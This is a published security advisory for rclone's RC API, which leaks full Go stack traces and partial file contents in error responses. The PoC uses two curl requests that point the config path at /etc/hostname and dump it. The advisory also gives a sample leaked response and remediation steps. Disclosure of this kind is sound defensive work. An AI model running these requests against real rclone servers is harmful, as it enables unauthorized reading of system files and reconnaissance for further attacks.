GHSA-gwfq-86j8-7qhv: Low severity go/github.com/rclone/rclone vulnerability

Published Aug 5, 2026
·
Updated

Summary

When an RC API call triggers a panic (recovered by the job runner), the full Go stack trace is included in the JSON error response. This leaks internal file paths, Go module versions, goroutine state, and memory addresses to the API caller.

Details

The panic recovery in fs/rc/jobs/job.go:110-115:

go func (j Job) run(ctx context.Context, fn rc.Func, in rc.Params) { defer func() { if r := recover(); r != nil { j.mu.Lock() j.EndTime = time.Now() j.Error = fmt.Sprintf("panic received: %v \n%s", r, string(debug.Stack())) // ... } }()

The full debug.Stack() output is placed into j.Error, which is then returned in the HTTP response JSON.

PoC

Trigger a parse error by setting config path to a non-INI file, then calling dump:

bash curl -s -X POST http://localhost:5572/config/setpath \ -H "Content-Type: application/json" \ -d '{"path":"/etc/hostname"}'

curl -s -X POST http://localhost:5572/config/dump

Response includes:

json { "error": "panic received: fatal error: Failed to load config file \"/etc/hostname\": could not parse line: ... \ngoroutine 9 [running]:\nruntime/debug.Stack()\n\truntime/debug/stack.go:26 +0x64\ngithub.com/rclone/rclone/fs/rc/jobs.(Job).run.func1()\n\tgithub.com/rclone/rclone/fs/rc/jobs/job.go:112 +0x34\n...", "status": 500 }

Disclosed information includes: - Full filesystem paths (github.com/rclone/rclone/fs/config/config.go:377) - Go module versions (github.com/go-chi/chi/v5@v5.2.5) - Go runtime version (from binary) - Goroutine IDs and states - Memory addresses (ASLR leak) - File contents (first unparseable line of the target file)

Tested and confirmed on rclone v1.74.4.

Impact

Information disclosure that aids exploitation of other vulnerabilities. Stack traces reveal internal architecture, dependency versions (useful for known-CVE targeting), and memory layout. The error message also leaks partial file contents (the first line that fails INI parsing), which can be used alongside the arbitrary file read finding as a complementary file read primitive for non-INI files.

Affected Versions

All versions with RC API support through at least v1.74.4.

Remediation

Return a generic error message to the API caller. Log the full stack trace server-side only. Strip debug.Stack() from HTTP responses.

Affected Software

1 affected componentFixes available
go/github.com/rclone/rclone<=1.74.4
1.75.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade go/github.com/rclone/rclone to a version that resolves this vulnerability.

    Fixed in 1.75.0
  2. Configuration

    Update the RC API panic recovery flow in fs/rc/jobs/job.go (lines 110-115) so that j.Error no longer includes debug.Stack() (full Go stack trace). Instead, log the full stack trace server-side only and return a generic error message in the JSON response.

    rclone RC API (config/dump / config/setpath) HTTP error response handling (stack trace exposure) = Strip debug.Stack() from HTTP responses; return only a generic error message to API caller
  3. Operational

    After deploying the fix, review RC API server logs for previously exposed stack traces and memory-layout details; rotate any secrets that may have been exposed during exploitation attempts.

Event History

Aug 5, 2026
Advisory Published
via GitHub·07:59 PM
Data Sourced
via GitHub·07:59 PM
DescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203